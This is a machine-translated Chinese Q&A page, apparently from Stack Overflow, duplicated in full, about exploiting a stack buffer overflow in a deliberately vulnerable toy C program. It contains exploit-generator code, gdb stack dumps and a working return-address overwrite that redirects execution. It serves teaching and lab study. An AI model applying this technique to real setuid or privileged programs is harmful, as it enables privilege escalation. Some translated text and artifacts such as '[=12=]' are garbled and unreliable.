如何实现缓冲区溢出
How to implement a buffer overflow
我正在尝试使用缓冲区溢出来获得对 root 用户的访问权限(纯粹用于教育目的)
我已经编写了以下代码来将所需的输入写入错误的文件
int main(int argc, char **argv) {
char buffer[512];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, 512);
/*First 20 characters for buffer*/
strcpy(buffer, "a b c d e f g h i j ");
/*Over write the next 8 characters*/
strcat(buffer, "a b c d ");
/*Overwrite return address*/
strcat(buffer, argv[1]);
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 512, 1, badfile);
fclose(badfile);
}
这是具有 root 权限的程序应该执行的代码
int bof(char *str){
char buffer[20];
/* The following allows buffer overflow */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv) {
char str[BSIZE];
FILE *badfile;
char *badfname = "badfile";
badfile = fopen(badfname, "r");
fread(str, sizeof(char), BSIZE, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
我希望从 badfile 读取的输入更改 bof 的 return 地址,这样它将 return 改为我已写入错误文件输入的代码。但是,我的当前代码只是遇到段错误。我知道这意味着我正在将新的 return 地址写入内存的错误部分,但我也不确定如何找到正确的写入位置。
我在 32 位虚拟机上 运行 并且包含了第二段代码的 gdb 反汇编
Dump of assembler code for function main:
0x080484d6 <main+0>: lea 0x4(%esp),%ecx
0x080484da <main+4>: and [=12=]xfffffff0,%esp
0x080484dd <main+7>: pushl -0x4(%ecx)
0x080484e0 <main+10>: push %ebp
0x080484e1 <main+11>: mov %esp,%ebp
0x080484e3 <main+13>: push %ecx
0x080484e4 <main+14>: sub [=12=]x224,%esp
0x080484ea <main+20>: movl [=12=]x8048623,-0x8(%ebp)
0x080484f1 <main+27>: movl [=12=]x804862b,0x4(%esp)
0x080484f9 <main+35>: mov -0x8(%ebp),%eax
0x080484fc <main+38>: mov %eax,(%esp)
0x080484ff <main+41>: call 0x80483a0 <fopen@plt>
0x08048504 <main+46>: mov %eax,-0xc(%ebp)
0x08048507 <main+49>: mov -0xc(%ebp),%eax
0x0804850a <main+52>: mov %eax,0xc(%esp)
0x0804850e <main+56>: movl [=12=]x200,0x8(%esp)
0x08048516 <main+64>: movl [=12=]x1,0x4(%esp)
0x0804851e <main+72>: lea -0x20c(%ebp),%eax
0x08048524 <main+78>: mov %eax,(%esp)
0x08048527 <main+81>: call 0x80483e0 <fread@plt>
0x0804852c <main+86>: lea -0x20c(%ebp),%eax
0x08048532 <main+92>: mov %eax,(%esp)
---Type <return> to continue, or q <return> to quit---
0x08048535 <main+95>: call 0x80484a4 <bof>
0x0804853a <main+100>: movl [=12=]x804862d,(%esp)
0x08048541 <main+107>: call 0x80483d0 <puts@plt>
0x08048546 <main+112>: mov [=12=]x1,%eax
0x0804854b <main+117>: add [=12=]x224,%esp
0x08048551 <main+123>: pop %ecx
0x08048552 <main+124>: pop %ebp
0x08048553 <main+125>: lea -0x4(%ecx),%esp
0x08048556 <main+128>: ret
End of assembler dump.
(gdb)
(gdb) disassemble bof
Dump of assembler code for function bof:
0x080484a4 <bof+0>: push %ebp
0x080484a5 <bof+1>: mov %esp,%ebp
0x080484a7 <bof+3>: sub [=12=]x28,%esp
0x080484aa <bof+6>: mov 0x8(%ebp),%eax
0x080484ad <bof+9>: mov %eax,0x4(%esp)
0x080484b1 <bof+13>: lea -0x14(%ebp),%eax
0x080484b4 <bof+16>: mov %eax,(%esp)
0x080484b7 <bof+19>: call 0x80483b0 <strcpy@plt>
0x080484bc <bof+24>: lea -0x14(%ebp),%eax
0x080484bf <bof+27>: mov %eax,0x4(%esp)
0x080484c3 <bof+31>: movl [=12=]x8048620,(%esp)
0x080484ca <bof+38>: call 0x80483c0 <printf@plt>
0x080484cf <bof+43>: mov [=12=]x1,%eax
0x080484d4 <bof+48>: leave
0x080484d5 <bof+49>: ret
End of assembler dump.
免责声明:
我正在使用 Window 7 和 gcc-4.8.3(来自 http://mingw-w64.org/doku.php), along with gdb version 7.8 (also from http://mingw-w64.org/doku.php)。此外,Windows 7 似乎没有 ASLR,因为我 运行 这个小测试程序:
#include <stdio.h>
unsigned long find_start(void)
{
__asm__("movl %esp, %eax");
}
int main()
{
printf("0x%X\n", find_start();
return (0);
}
我得到相同的内存位置,如下图:
Q:\>find_addr1
0x28fea8
Q:\>find_addr1
0x28fea8
Q:\>find_addr1
0x28fea8
此程序摘自 Chris Anley 等人的 "The Shellcoder's Handbook:Discovering and Exploiting Security Holes"。 al.,它评论道:
“..如果您注意到程序每次打印出的地址都不同,这可能意味着您正在 运行 发布带有 grsecurity 补丁或类似内容的分发版。”如果您确实有不同的地址,这将使复制以下内容变得更加困难。例如,运行ning 在我的 Ubuntu-14.04 LTS 系统上,我得到以下信息:
ubuntu:~/projects$ ./find_addr
0x4F5AF640
ubuntu:~/projects$ ./find_addr
0xCE71D3B0
ubuntu:~/projects$ ./find_addr
0xD4A21710
好的,既然预赛已经结束,现在开始你的例子。因此,使用您的代码生成“badfile”,我创建了这个文件:
Q:\SE_test>genFile 0x43434343
Q:\SE_test>more badfile
a b c d e f g h i j a b c d 0x43434343ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉ
Q:\SE_test>
现在,让我们 运行 GDB 下的易受攻击的程序,并在调用 bof 之前停止。此时的反汇编如下所示:
0x004015db <+92>: call 0x4027b8 <fread>
=> 0x004015e0 <+97>: lea 0x18(%esp),%eax
0x004015e4 <+101>: mov %eax,(%esp)
0x004015e7 <+104>: call 0x401560 <bof>
0x004015ec <+109>: movl [=14=]x40402e,(%esp)
此时我们可以查看一些感兴趣的值。首先,记下调用 bof (0x004015ec) 后指令的地址,稍后我们将需要它。其次,我们可以检查一些重要的变量和寄存器:
(gdb) print str
= "a b c d e f g h i j a b c d 0x43434343[=15=]0", '0' <repeats 473 times>
(gdb) print $ebp
= (void *) 0x28fec8
(gdb) print $esp
= (void *) 0x28fca0
因此,我们现在知道在内存中找到 main 的激活帧的位置,以及验证您是否已正确读取字符串。查看字符串的值,我确实看到了两件事,以后可能会导致问题;
注意到字符串中嵌入的空终止符 (\000) 了吗?这将导致 bof 中的字符串复制停止。我们仍然应该得到缓冲区溢出。在 shell 代码中需要注意的是我们不能有 0x00 字节并期望使用字符串处理函数。
请注意,我输入的地址 (0x43434343) 显示为文本而非地址。据我所知,这是使用 Windows; 的结果。但是我们仍然可以看到我们正在写入内存的位置并检查事情是否在正确的地方。
现在我们可以进入 bof 看看我们有什么:
(gdb) s
bof (str=0x28fcb8 "a b c d e f g h i j a b c d 0x43434343") at overflow1.c:13
13 strcpy(buffer, str);
(gdb) print $esp
= (void *) 0x28fc60
(gdb) print $ebp
= (void *) 0x28fc98
(gdb) x/80xb 0x28fc60
0x28fc60: 0x00 0x02 0x00 0x00 0x50 0xfc 0x28 0x00
0x28fc68: 0x60 0x29 0x76 0x76 0xc4 0xff 0x28 0x00
0x28fc70: 0xd5 0x8c 0x6e 0x76 0xc7 0x1f 0xa9 0x74
0x28fc78: 0xfe 0xff 0xff 0xff 0x6f 0xf4 0x6d 0x76
0x28fc80: 0xe0 0xf3 0x6d 0x76 0xb8 0xfc 0x28 0x00
0x28fc88: 0xff 0xff 0xff 0xff 0x01 0x00 0x00 0x00
0x28fc90: 0x00 0x02 0x00 0x00 0x60 0x29 0x76 0x76
0x28fc98: 0xc8 0xfe 0x28 0x00 0xec 0x15 0x40 0x00
0x28fca0: 0xb8 0xfc 0x28 0x00 0x01 0x00 0x00 0x00
0x28fca8: 0x00 0x02 0x00 0x00 0x60 0x29 0x76 0x76
至此,我们对内存的布局有了初步的了解,也可以看看内存的内容了。特别有趣的是位于内存位置 0x28fc9c 和 0x28fca0 的值,我已经输入到下图中:
address contents
+------------+
0x28fec8 | | <-- base pointer for main's stack frame
+------------+
| |
~ ~
~ ~
| |
+------------+
0x28fca0 | 0x0028fcb8 | <-- stack pointer for main's stack frame
+------------+
0x28fc9c | 0x004015ec | <--- stored eip
+------------+
0x28fc98 | 0x0028fec8 | <-- base pointer for bof's stack frame
+------------+
| |
~ ~
~ ~
| |
+------------+
0x28fc60 | | <-- stack pointer for bof's stack frame
+------------+
查看 main 的反汇编我们可以看到调用 bof 后的下一条指令位于 0x004015ec,我们可以看到它已被推入内存位置 0x0028fc9c.
处的堆栈
现在分析已经完成,我们可以执行字符串复制,然后再次查看内存,看看我们做了什么(记住 'a' 的 ASCII 值为 0x61,而 space 的 ASCII 值为 0x20)。作为参考,我们可以看到 bof 中的缓冲区位于内存地址 0x000x28fc7c
(gdb) x/80xb 0x28fc60
0x28fc60: 0x7c 0xfc 0x28 0x00 0xb8 0xfc 0x28 0x00
0x28fc68: 0x60 0x29 0x76 0x76 0xc4 0xff 0x28 0x00
0x28fc70: 0xd5 0x8c 0x6e 0x76 0xc7 0x1f 0xa9 0x74
0x28fc78: 0xfe 0xff 0xff 0xff 0x61 0x20 0x62 0x20
0x28fc80: 0x63 0x20 0x64 0x20 0x65 0x20 0x66 0x20
0x28fc88: 0x67 0x20 0x68 0x20 0x69 0x20 0x6a 0x20
0x28fc90: 0x61 0x20 0x62 0x20 0x63 0x20 0x64 0x20
0x28fc98: 0x30 0x78 0x34 0x33 0x34 0x33 0x34 0x33
0x28fca0: 0x34 0x33 0x00 0x00 0x01 0x00 0x00 0x00
0x28fca8: 0x00 0x02 0x00 0x00 0x60 0x29 0x76 0x76
我们对存储的 eip 所在的区域特别感兴趣:
0x28fca8: 0x00 0x02 0x00 0x00
0x28fca4: 0x01 0x00 0x00 0x00
0x28fca0: 0x34 0x33 0x00 0x00
0x28fc9c: 0x34 0x33 0x34 0x33
0x28fc98: 0x30 0x78 0x34 0x33
由此看来,我作为命令行参数 (0x43) 输入的内容的第一部分正在为 bof 覆盖 ebp。由此我怀疑在写出新地址之前,您需要在字符串中再添加四个字节。此外,您可能需要检查以确保您的命令行参数得到正确处理。
作为对此的测试,我将您的两个程序稍微修改为:
首先将生成坏文件的程序修改为:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[512];
FILE *badfile;
int ndx;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, 512);
/*First n-characters for buffer*/
for(ndx = 0; ndx < atoi(argv[1]); ndx++)
buffer[ndx] = 'A';
/*Overwrite return address*/
buffer[ndx++] = 0x7f;
buffer[ndx++] = 0x15;
buffer[ndx++] = 0x40;
buffer[ndx++] = 0x00;
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 512, 1, badfile);
fclose(badfile);
return 0;
}
您的命令行参数现在允许您在写入新的 return 地址之前输入要写入文件的字节数。我还修改了你的易受攻击的程序,如下所示:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BSIZE 512
int bof(char *str)
{
char buffer[20];
/* The following allows buffer overflow */
strcpy(buffer, str);
return 1;
}
void output()
{
printf("We should never see this\n");
exit(1);
}
int main(int argc, char **argv)
{
char str[BSIZE];
FILE *badfile;
char *badfname = "badfile";
badfile = fopen(badfname, "r");
fread(str, sizeof(char), BSIZE, badfile);
bof(str);
printf("Returned Properly\n");
return 0;
}
注意 output 实际上是死代码,但是快速反汇编后,我可以发现 output 从 0x0040157f 开始。这是我在上面的 genFile 代码中输入缓冲区的值。现在
对于几个测试用例:
Q:\SE_test>gcc -ansi -pedantic -Wall genFile.c -o genFile
Q:\SE_test>gcc -ansi -pedantic -Wall overflow1.c -o overflow1
Q:\SE_test>genFile 28
Q:\SE_test>overflow1
Returned Properly (see note below)
Q:\SE_test>genFile 32
Q:\SE_test>overflow1
We should never see this
Q:\SE_test>
注意:在第一个运行中,即使程序显示"Returned Properly",程序还是崩溃了,windows显示了"This program has stopped working dialog"。
希望对您有所帮助,如有其他问题,请追问。
T.
我正在尝试使用缓冲区溢出来获得对 root 用户的访问权限(纯粹用于教育目的)
我已经编写了以下代码来将所需的输入写入错误的文件
int main(int argc, char **argv) {
char buffer[512];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, 512);
/*First 20 characters for buffer*/
strcpy(buffer, "a b c d e f g h i j ");
/*Over write the next 8 characters*/
strcat(buffer, "a b c d ");
/*Overwrite return address*/
strcat(buffer, argv[1]);
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 512, 1, badfile);
fclose(badfile);
}
这是具有 root 权限的程序应该执行的代码
int bof(char *str){
char buffer[20];
/* The following allows buffer overflow */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv) {
char str[BSIZE];
FILE *badfile;
char *badfname = "badfile";
badfile = fopen(badfname, "r");
fread(str, sizeof(char), BSIZE, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
我希望从 badfile 读取的输入更改 bof 的 return 地址,这样它将 return 改为我已写入错误文件输入的代码。但是,我的当前代码只是遇到段错误。我知道这意味着我正在将新的 return 地址写入内存的错误部分,但我也不确定如何找到正确的写入位置。 我在 32 位虚拟机上 运行 并且包含了第二段代码的 gdb 反汇编
Dump of assembler code for function main:
0x080484d6 <main+0>: lea 0x4(%esp),%ecx
0x080484da <main+4>: and [=12=]xfffffff0,%esp
0x080484dd <main+7>: pushl -0x4(%ecx)
0x080484e0 <main+10>: push %ebp
0x080484e1 <main+11>: mov %esp,%ebp
0x080484e3 <main+13>: push %ecx
0x080484e4 <main+14>: sub [=12=]x224,%esp
0x080484ea <main+20>: movl [=12=]x8048623,-0x8(%ebp)
0x080484f1 <main+27>: movl [=12=]x804862b,0x4(%esp)
0x080484f9 <main+35>: mov -0x8(%ebp),%eax
0x080484fc <main+38>: mov %eax,(%esp)
0x080484ff <main+41>: call 0x80483a0 <fopen@plt>
0x08048504 <main+46>: mov %eax,-0xc(%ebp)
0x08048507 <main+49>: mov -0xc(%ebp),%eax
0x0804850a <main+52>: mov %eax,0xc(%esp)
0x0804850e <main+56>: movl [=12=]x200,0x8(%esp)
0x08048516 <main+64>: movl [=12=]x1,0x4(%esp)
0x0804851e <main+72>: lea -0x20c(%ebp),%eax
0x08048524 <main+78>: mov %eax,(%esp)
0x08048527 <main+81>: call 0x80483e0 <fread@plt>
0x0804852c <main+86>: lea -0x20c(%ebp),%eax
0x08048532 <main+92>: mov %eax,(%esp)
---Type <return> to continue, or q <return> to quit---
0x08048535 <main+95>: call 0x80484a4 <bof>
0x0804853a <main+100>: movl [=12=]x804862d,(%esp)
0x08048541 <main+107>: call 0x80483d0 <puts@plt>
0x08048546 <main+112>: mov [=12=]x1,%eax
0x0804854b <main+117>: add [=12=]x224,%esp
0x08048551 <main+123>: pop %ecx
0x08048552 <main+124>: pop %ebp
0x08048553 <main+125>: lea -0x4(%ecx),%esp
0x08048556 <main+128>: ret
End of assembler dump.
(gdb)
(gdb) disassemble bof
Dump of assembler code for function bof:
0x080484a4 <bof+0>: push %ebp
0x080484a5 <bof+1>: mov %esp,%ebp
0x080484a7 <bof+3>: sub [=12=]x28,%esp
0x080484aa <bof+6>: mov 0x8(%ebp),%eax
0x080484ad <bof+9>: mov %eax,0x4(%esp)
0x080484b1 <bof+13>: lea -0x14(%ebp),%eax
0x080484b4 <bof+16>: mov %eax,(%esp)
0x080484b7 <bof+19>: call 0x80483b0 <strcpy@plt>
0x080484bc <bof+24>: lea -0x14(%ebp),%eax
0x080484bf <bof+27>: mov %eax,0x4(%esp)
0x080484c3 <bof+31>: movl [=12=]x8048620,(%esp)
0x080484ca <bof+38>: call 0x80483c0 <printf@plt>
0x080484cf <bof+43>: mov [=12=]x1,%eax
0x080484d4 <bof+48>: leave
0x080484d5 <bof+49>: ret
End of assembler dump.
免责声明:
我正在使用 Window 7 和 gcc-4.8.3(来自 http://mingw-w64.org/doku.php), along with gdb version 7.8 (also from http://mingw-w64.org/doku.php)。此外,Windows 7 似乎没有 ASLR,因为我 运行 这个小测试程序:
#include <stdio.h> unsigned long find_start(void) { __asm__("movl %esp, %eax"); } int main() { printf("0x%X\n", find_start(); return (0); }我得到相同的内存位置,如下图:
Q:\>find_addr1 0x28fea8 Q:\>find_addr1 0x28fea8 Q:\>find_addr1 0x28fea8此程序摘自 Chris Anley 等人的 "The Shellcoder's Handbook:Discovering and Exploiting Security Holes"。 al.,它评论道: “..如果您注意到程序每次打印出的地址都不同,这可能意味着您正在 运行 发布带有 grsecurity 补丁或类似内容的分发版。”如果您确实有不同的地址,这将使复制以下内容变得更加困难。例如,运行ning 在我的 Ubuntu-14.04 LTS 系统上,我得到以下信息:
ubuntu:~/projects$ ./find_addr 0x4F5AF640 ubuntu:~/projects$ ./find_addr 0xCE71D3B0 ubuntu:~/projects$ ./find_addr 0xD4A21710
好的,既然预赛已经结束,现在开始你的例子。因此,使用您的代码生成“badfile”,我创建了这个文件:
Q:\SE_test>genFile 0x43434343
Q:\SE_test>more badfile
a b c d e f g h i j a b c d 0x43434343ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉ
Q:\SE_test>
现在,让我们 运行 GDB 下的易受攻击的程序,并在调用 bof 之前停止。此时的反汇编如下所示:
0x004015db <+92>: call 0x4027b8 <fread>
=> 0x004015e0 <+97>: lea 0x18(%esp),%eax
0x004015e4 <+101>: mov %eax,(%esp)
0x004015e7 <+104>: call 0x401560 <bof>
0x004015ec <+109>: movl [=14=]x40402e,(%esp)
此时我们可以查看一些感兴趣的值。首先,记下调用 bof (0x004015ec) 后指令的地址,稍后我们将需要它。其次,我们可以检查一些重要的变量和寄存器:
(gdb) print str
= "a b c d e f g h i j a b c d 0x43434343[=15=]0", '0' <repeats 473 times>
(gdb) print $ebp
= (void *) 0x28fec8
(gdb) print $esp
= (void *) 0x28fca0
因此,我们现在知道在内存中找到 main 的激活帧的位置,以及验证您是否已正确读取字符串。查看字符串的值,我确实看到了两件事,以后可能会导致问题;
注意到字符串中嵌入的空终止符 (\000) 了吗?这将导致
bof中的字符串复制停止。我们仍然应该得到缓冲区溢出。在 shell 代码中需要注意的是我们不能有 0x00 字节并期望使用字符串处理函数。请注意,我输入的地址 (0x43434343) 显示为文本而非地址。据我所知,这是使用 Windows; 的结果。但是我们仍然可以看到我们正在写入内存的位置并检查事情是否在正确的地方。
现在我们可以进入 bof 看看我们有什么:
(gdb) s
bof (str=0x28fcb8 "a b c d e f g h i j a b c d 0x43434343") at overflow1.c:13
13 strcpy(buffer, str);
(gdb) print $esp
= (void *) 0x28fc60
(gdb) print $ebp
= (void *) 0x28fc98
(gdb) x/80xb 0x28fc60
0x28fc60: 0x00 0x02 0x00 0x00 0x50 0xfc 0x28 0x00
0x28fc68: 0x60 0x29 0x76 0x76 0xc4 0xff 0x28 0x00
0x28fc70: 0xd5 0x8c 0x6e 0x76 0xc7 0x1f 0xa9 0x74
0x28fc78: 0xfe 0xff 0xff 0xff 0x6f 0xf4 0x6d 0x76
0x28fc80: 0xe0 0xf3 0x6d 0x76 0xb8 0xfc 0x28 0x00
0x28fc88: 0xff 0xff 0xff 0xff 0x01 0x00 0x00 0x00
0x28fc90: 0x00 0x02 0x00 0x00 0x60 0x29 0x76 0x76
0x28fc98: 0xc8 0xfe 0x28 0x00 0xec 0x15 0x40 0x00
0x28fca0: 0xb8 0xfc 0x28 0x00 0x01 0x00 0x00 0x00
0x28fca8: 0x00 0x02 0x00 0x00 0x60 0x29 0x76 0x76
至此,我们对内存的布局有了初步的了解,也可以看看内存的内容了。特别有趣的是位于内存位置 0x28fc9c 和 0x28fca0 的值,我已经输入到下图中:
address contents
+------------+
0x28fec8 | | <-- base pointer for main's stack frame
+------------+
| |
~ ~
~ ~
| |
+------------+
0x28fca0 | 0x0028fcb8 | <-- stack pointer for main's stack frame
+------------+
0x28fc9c | 0x004015ec | <--- stored eip
+------------+
0x28fc98 | 0x0028fec8 | <-- base pointer for bof's stack frame
+------------+
| |
~ ~
~ ~
| |
+------------+
0x28fc60 | | <-- stack pointer for bof's stack frame
+------------+
查看 main 的反汇编我们可以看到调用 bof 后的下一条指令位于 0x004015ec,我们可以看到它已被推入内存位置 0x0028fc9c.
现在分析已经完成,我们可以执行字符串复制,然后再次查看内存,看看我们做了什么(记住 'a' 的 ASCII 值为 0x61,而 space 的 ASCII 值为 0x20)。作为参考,我们可以看到 bof 中的缓冲区位于内存地址 0x000x28fc7c
(gdb) x/80xb 0x28fc60
0x28fc60: 0x7c 0xfc 0x28 0x00 0xb8 0xfc 0x28 0x00
0x28fc68: 0x60 0x29 0x76 0x76 0xc4 0xff 0x28 0x00
0x28fc70: 0xd5 0x8c 0x6e 0x76 0xc7 0x1f 0xa9 0x74
0x28fc78: 0xfe 0xff 0xff 0xff 0x61 0x20 0x62 0x20
0x28fc80: 0x63 0x20 0x64 0x20 0x65 0x20 0x66 0x20
0x28fc88: 0x67 0x20 0x68 0x20 0x69 0x20 0x6a 0x20
0x28fc90: 0x61 0x20 0x62 0x20 0x63 0x20 0x64 0x20
0x28fc98: 0x30 0x78 0x34 0x33 0x34 0x33 0x34 0x33
0x28fca0: 0x34 0x33 0x00 0x00 0x01 0x00 0x00 0x00
0x28fca8: 0x00 0x02 0x00 0x00 0x60 0x29 0x76 0x76
我们对存储的 eip 所在的区域特别感兴趣:
0x28fca8: 0x00 0x02 0x00 0x00
0x28fca4: 0x01 0x00 0x00 0x00
0x28fca0: 0x34 0x33 0x00 0x00
0x28fc9c: 0x34 0x33 0x34 0x33
0x28fc98: 0x30 0x78 0x34 0x33
由此看来,我作为命令行参数 (0x43) 输入的内容的第一部分正在为 bof 覆盖 ebp。由此我怀疑在写出新地址之前,您需要在字符串中再添加四个字节。此外,您可能需要检查以确保您的命令行参数得到正确处理。
作为对此的测试,我将您的两个程序稍微修改为:
首先将生成坏文件的程序修改为:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[512];
FILE *badfile;
int ndx;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, 512);
/*First n-characters for buffer*/
for(ndx = 0; ndx < atoi(argv[1]); ndx++)
buffer[ndx] = 'A';
/*Overwrite return address*/
buffer[ndx++] = 0x7f;
buffer[ndx++] = 0x15;
buffer[ndx++] = 0x40;
buffer[ndx++] = 0x00;
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 512, 1, badfile);
fclose(badfile);
return 0;
}
您的命令行参数现在允许您在写入新的 return 地址之前输入要写入文件的字节数。我还修改了你的易受攻击的程序,如下所示:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BSIZE 512
int bof(char *str)
{
char buffer[20];
/* The following allows buffer overflow */
strcpy(buffer, str);
return 1;
}
void output()
{
printf("We should never see this\n");
exit(1);
}
int main(int argc, char **argv)
{
char str[BSIZE];
FILE *badfile;
char *badfname = "badfile";
badfile = fopen(badfname, "r");
fread(str, sizeof(char), BSIZE, badfile);
bof(str);
printf("Returned Properly\n");
return 0;
}
注意 output 实际上是死代码,但是快速反汇编后,我可以发现 output 从 0x0040157f 开始。这是我在上面的 genFile 代码中输入缓冲区的值。现在
对于几个测试用例:
Q:\SE_test>gcc -ansi -pedantic -Wall genFile.c -o genFile
Q:\SE_test>gcc -ansi -pedantic -Wall overflow1.c -o overflow1
Q:\SE_test>genFile 28
Q:\SE_test>overflow1
Returned Properly (see note below)
Q:\SE_test>genFile 32
Q:\SE_test>overflow1
We should never see this
Q:\SE_test>
注意:在第一个运行中,即使程序显示"Returned Properly",程序还是崩溃了,windows显示了"This program has stopped working dialog"。
希望对您有所帮助,如有其他问题,请追问。 T.